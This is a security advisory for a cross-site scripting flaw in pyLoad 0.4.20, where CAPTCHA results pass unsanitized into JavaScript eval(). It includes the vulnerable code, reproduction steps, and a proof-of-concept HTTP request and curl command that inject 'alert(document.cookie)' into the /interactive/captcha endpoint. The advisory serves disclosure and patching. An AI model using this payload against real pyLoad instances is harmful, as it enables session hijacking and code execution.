PYSEC-2026-496
pyLoad vulnerable to XSS through insecure CAPTCHA
Details
#### Summary An unsafe JavaScript evaluation vulnerability in pyLoad’s CAPTCHA processing code allows **unauthenticated remote attackers** to execute **arbitrary code** in the client browser and potentially the backend server. Exploitation requires no user interaction or authentication and can result in session hijacking, credential theft, and full system rce.
#### Details The vulnerable code resides in ```javascript function onCaptchaResult(result) { eval(result); // Direct execution of attacker-controlled input } ```
* The `onCaptchaResult()` function directly passes CAPTCHA results (sent from the user) into `eval()` * No sanitization or validation is performed on this input * A malicious CAPTCHA result can include JavaScript such as `fetch()` or `child_process.exec()` in environments using NodeJS * Attackers can fully hijack sessions and pivot to remote code execution on the server if the environment allows it
### Reproduction Methods 1. **Official Source Installation**: ```bash git clone https://github.com/pyload/pyload cd pyload git checkout 0.4.20 python -m pip install -e . pyload --userdir=/tmp/pyload ```
2. **Virtual Environment**: ```bash python -m venv pyload-env source pyload-env/bin/activate pip install pyload==0.4.20 pyload ```
## CAPTCHA Endpoint Verification
**Technical Clarification**: 1. The vulnerable endpoint is actually: ``` /interactive/captcha ```
2. Complete PoC Request: ```http POST /interactive/captcha HTTP/1.1 Host: localhost:8000 Content-Type: application/x-www-form-urlencoded cid=123&response=1%3Balert(document.cookie) ```
3. Curl Command Correction: ```bash curl -X POST "http://localhost:8000/interactive/captcha" \ -d "cid=123&response=1%3Balert(document.cookie)" ```
1. **Vulnerable Code Location**: The eval() vulnerability is confirmed in: ``` src/pyload/webui/app/static/js/captcha-interactive.user.js ```
### **Resources**
1. https://github.com/pyload/pyload/commit/909e5c97885237530d1264cfceb5555870eb9546 2. [OWASP: Avoid `eval()`](https://cheatsheetseries.owasp.org/cheatsheets/JavaScript_Security_Cheat_Sheet.html#eval) 3. [#4586](https://github.com/pyload/pyload/pull/4586)
Are you affected?
Enter the version of the package you're using.
Affected packages
References
- https://github.com/pyload/pyload/security/advisories/GHSA-8w3f-4r8f-pf53 [WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2025-53890 [ADVISORY]
- https://github.com/pyload/pyload/pull/4586 [WEB]
- https://github.com/pyload/pyload/commit/909e5c97885237530d1264cfceb5555870eb9546 [WEB]
- https://github.com/pyload/pyload [PACKAGE]
- https://pypi.org/project/pyload-ng [PACKAGE]
- https://github.com/advisories/GHSA-8w3f-4r8f-pf53 [ADVISORY]